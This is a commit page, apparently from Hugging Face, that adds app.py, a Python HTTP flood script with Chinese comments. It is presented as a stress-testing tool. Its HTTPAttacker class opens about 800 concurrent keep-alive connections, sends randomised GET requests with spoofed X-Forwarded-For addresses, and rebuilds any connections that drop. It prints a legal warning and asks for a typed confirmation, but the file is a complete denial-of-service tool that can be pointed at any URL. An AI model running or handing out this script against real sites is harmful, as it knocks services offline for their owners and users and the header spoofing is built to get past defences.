cnmksjs commited on
Commit
355e608
·
verified ·
1 Parent(s): dc1e934

Create app.py

Browse files
Files changed (1) hide show
  1. app.py +282 -0
app.py ADDED
@@ -0,0 +1,282 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import socket
2
+ import threading
3
+ import time
4
+ import random
5
+ import ssl
6
+ import sys
7
+ from urllib.parse import urlparse
8
+
9
+ # ====== 配置区 ======
10
+ # !!! 必须修改为你要测试的完整URL !!!
11
+ # 示例: "http://example.com/api/test" 或 "https://example.com:8080/path"
12
+ TARGET_URL = "http://your-own-test-site.com/some/path"
13
+ # ===================
14
+
15
+ # 解析目标URL
16
+ def parse_target_url(url):
17
+ """解析URL,返回协议、域名、端口、路径"""
18
+ parsed = urlparse(url)
19
+
20
+ # 获取协议
21
+ scheme = parsed.scheme if parsed.scheme else 'http'
22
+
23
+ # 获取域名
24
+ domain = parsed.hostname
25
+ if not domain:
26
+ print(f"❌ 无法解析URL中的域名: {url}")
27
+ sys.exit(1)
28
+
29
+ # 获取端口
30
+ if parsed.port:
31
+ port = parsed.port
32
+ elif scheme == 'https':
33
+ port = 443
34
+ else:
35
+ port = 80
36
+
37
+ # 获取路径
38
+ path = parsed.path if parsed.path else '/'
39
+ if parsed.query:
40
+ path += f"?{parsed.query}"
41
+
42
+ use_https = (scheme == 'https')
43
+
44
+ print(f"✅ URL解析结果:")
45
+ print(f" 协议: {scheme} {'(HTTPS)' if use_https else '(HTTP)'}")
46
+ print(f" 域名: {domain}")
47
+ print(f" 端口: {port}")
48
+ print(f" 路径: {path}")
49
+
50
+ return domain, port, path, use_https
51
+
52
+ # 攻击参数
53
+ WORKER_THREADS = 100 # 并发工作线程数
54
+ CONNECTIONS_PER_WORKER = 8 # 每个工作线程保持的连接数
55
+ REQUEST_INTERVAL = 0.05 # 请求间隔(秒)
56
+ RUN_DURATION = 30 # 运行时长(秒),0为无限
57
+
58
+ # 统计数据
59
+ stats = {
60
+ 'total_requests': 0,
61
+ 'successful': 0,
62
+ 'failed': 0,
63
+ 'active_connections': 0
64
+ }
65
+ stats_lock = threading.Lock()
66
+
67
+ def update_stats(success=True):
68
+ with stats_lock:
69
+ stats['total_requests'] += 1
70
+ if success:
71
+ stats['successful'] += 1
72
+ else:
73
+ stats['failed'] += 1
74
+
75
+ def print_stats():
76
+ with stats_lock:
77
+ elapsed = time.time() - stats.get('start_time', time.time())
78
+ rps = stats['total_requests'] / elapsed if elapsed > 0 else 0
79
+ success_rate = (stats['successful'] / stats['total_requests'] * 100) if stats['total_requests'] > 0 else 0
80
+
81
+ print(f"\r📊 请求: {stats['total_requests']} | 成功: {stats['successful']} | "
82
+ f"失败: {stats['failed']} | 成功率: {success_rate:.1f}% | "
83
+ f"RPS: {rps:.1f} | 活跃连接: {stats['active_connections']}", end='')
84
+
85
+ class HTTPAttacker:
86
+ def __init__(self, target_domain, target_port, base_path, use_https):
87
+ self.domain = target_domain
88
+ self.port = target_port
89
+ self.base_path = base_path
90
+ self.use_https = use_https
91
+ self.ip = None
92
+
93
+ # 解析域名获取IP
94
+ try:
95
+ self.ip = socket.gethostbyname(self.domain)
96
+ print(f"✅ 域名解析: {self.domain} -> {self.ip}")
97
+ except:
98
+ print(f"❌ 无法解析域名: {self.domain}")
99
+ sys.exit(1)
100
+
101
+ def create_connection(self):
102
+ """创建TCP/SSL连接"""
103
+ try:
104
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
105
+ sock.settimeout(5)
106
+ sock.connect((self.ip, self.port))
107
+
108
+ if self.use_https:
109
+ context = ssl.create_default_context()
110
+ sock = context.wrap_socket(sock, server_hostname=self.domain)
111
+
112
+ with stats_lock:
113
+ stats['active_connections'] += 1
114
+ return sock
115
+ except Exception as e:
116
+ return None
117
+
118
+ def create_http_request(self, connection_id):
119
+ """创建HTTP请求"""
120
+ # 随机化请求路径
121
+ paths = [self.base_path]
122
+ if random.random() > 0.5:
123
+ # 添加随机查询参数
124
+ paths.append(f"{self.base_path}?id={random.randint(1,1000)}")
125
+ if random.random() > 0.7:
126
+ # 添加随机后缀
127
+ paths.append(f"{self.base_path}/extra/{random.randint(1,100)}")
128
+
129
+ path = random.choice(paths)
130
+
131
+ # 请求头列表
132
+ headers = [
133
+ f"GET {path} HTTP/1.1",
134
+ f"Host: {self.domain}",
135
+ f"User-Agent: Mozilla/5.0 (Connection-{connection_id})",
136
+ f"X-Forwarded-For: {random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
137
+ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
138
+ "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8",
139
+ "Accept-Encoding: gzip, deflate",
140
+ "Connection: keep-alive",
141
+ "Cache-Control: max-age=0",
142
+ "\r\n"
143
+ ]
144
+
145
+ return "\r\n".join(headers).encode('utf-8')
146
+
147
+ def attack_worker(self, worker_id):
148
+ """攻击工作线程"""
149
+ connections = []
150
+
151
+ # 初始化连接池
152
+ for i in range(CONNECTIONS_PER_WORKER):
153
+ sock = self.create_connection()
154
+ if sock:
155
+ connections.append(sock)
156
+ time.sleep(0.1)
157
+
158
+ end_time = time.time() + RUN_DURATION if RUN_DURATION > 0 else float('inf')
159
+
160
+ # 攻击循环
161
+ while time.time() < end_time and connections:
162
+ for sock in connections[:]:
163
+ try:
164
+ request = self.create_http_request(worker_id)
165
+ sock.send(request)
166
+ update_stats(True)
167
+
168
+ # 部分接收响应
169
+ if random.random() > 0.3:
170
+ sock.settimeout(1)
171
+ try:
172
+ sock.recv(1024)
173
+ except:
174
+ pass
175
+
176
+ # 随机延迟
177
+ time.sleep(random.uniform(REQUEST_INTERVAL/2, REQUEST_INTERVAL*2))
178
+
179
+ except Exception as e:
180
+ # 连接失败,移除并尝试重建
181
+ connections.remove(sock)
182
+ with stats_lock:
183
+ stats['active_connections'] -= 1
184
+ update_stats(False)
185
+
186
+ # 重建连接
187
+ new_sock = self.create_connection()
188
+ if new_sock:
189
+ connections.append(new_sock)
190
+
191
+ # 维持连接池大小
192
+ while len(connections) < CONNECTIONS_PER_WORKER:
193
+ new_sock = self.create_connection()
194
+ if new_sock:
195
+ connections.append(new_sock)
196
+ time.sleep(0.2)
197
+
198
+ # 清理连接
199
+ for sock in connections:
200
+ try:
201
+ sock.close()
202
+ with stats_lock:
203
+ stats['active_connections'] -= 1
204
+ except:
205
+ pass
206
+
207
+ def main():
208
+ """主函数"""
209
+ print("=" * 70)
210
+ print("🌐 HTTP压力测试工具 - URL版")
211
+ print("=" * 70)
212
+
213
+ # 法律警告
214
+ print("\n⚠️ ⚠️ ⚠️ 重要法律警告:")
215
+ print("1. 仅限自有或获得书面授权的测试环境使用")
216
+ print("2. 对第三方网站攻击违反《网络安全法》第27条")
217
+ print("3. 违法攻击将面临最高7年有期徒刑")
218
+ print("=" * 70)
219
+
220
+ # 解析URL
221
+ target_domain, target_port, base_path, use_https = parse_target_url(TARGET_URL)
222
+
223
+ if target_domain == "your-own-test-site.com":
224
+ print("\n❌ 请将 TARGET_URL 修改为你要测试的实际URL")
225
+ sys.exit(1)
226
+
227
+ # 确认
228
+ confirm = input(f"\n目标URL: {TARGET_URL}\n确认开始压力测试?(输入'YES'继续): ")
229
+ if confirm != "YES":
230
+ print("操作取消")
231
+ sys.exit(0)
232
+
233
+ print(f"\n🚀 启动攻击:")
234
+ print(f" 工作线程: {WORKER_THREADS}")
235
+ print(f" 每线程连接数: {CONNECTIONS_PER_WORKER}")
236
+ print(f" 总并发连接: ~{WORKER_THREADS * CONNECTIONS_PER_WORKER}")
237
+ print(f" 运行时长: {'无限' if RUN_DURATION == 0 else f'{RUN_DURATION}秒'}")
238
+ print("=" * 70)
239
+
240
+ stats['start_time'] = time.time()
241
+
242
+ # 创建攻击器实例
243
+ attacker = HTTPAttacker(target_domain, target_port, base_path, use_https)
244
+
245
+ # 启动统计线程
246
+ def stats_printer():
247
+ while True:
248
+ print_stats()
249
+ time.sleep(1)
250
+
251
+ stats_thread = threading.Thread(target=stats_printer, daemon=True)
252
+ stats_thread.start()
253
+
254
+ # 启动工作线程
255
+ threads = []
256
+ for i in range(WORKER_THREADS):
257
+ t = threading.Thread(target=attacker.attack_worker, args=(i,), daemon=True)
258
+ t.start()
259
+ threads.append(t)
260
+ time.sleep(0.05) # 控制线程启动速度
261
+
262
+ print(f"\n✅ 已启动 {len(threads)} 个工作线程")
263
+ print("⏸️ 按 Ctrl+C 停止测试\n")
264
+
265
+ try:
266
+ # 等待结束
267
+ if RUN_DURATION > 0:
268
+ time.sleep(RUN_DURATION)
269
+ else:
270
+ while True:
271
+ time.sleep(1)
272
+ except KeyboardInterrupt:
273
+ print("\n\n🛑 正在停止测试...")
274
+ finally:
275
+ # 等待线程结束
276
+ time.sleep(2)
277
+ print_stats()
278
+ print("\n\n📈 测试结束")
279
+ print("=" * 70)
280
+
281
+ if __name__ == "__main__":
282
+ main()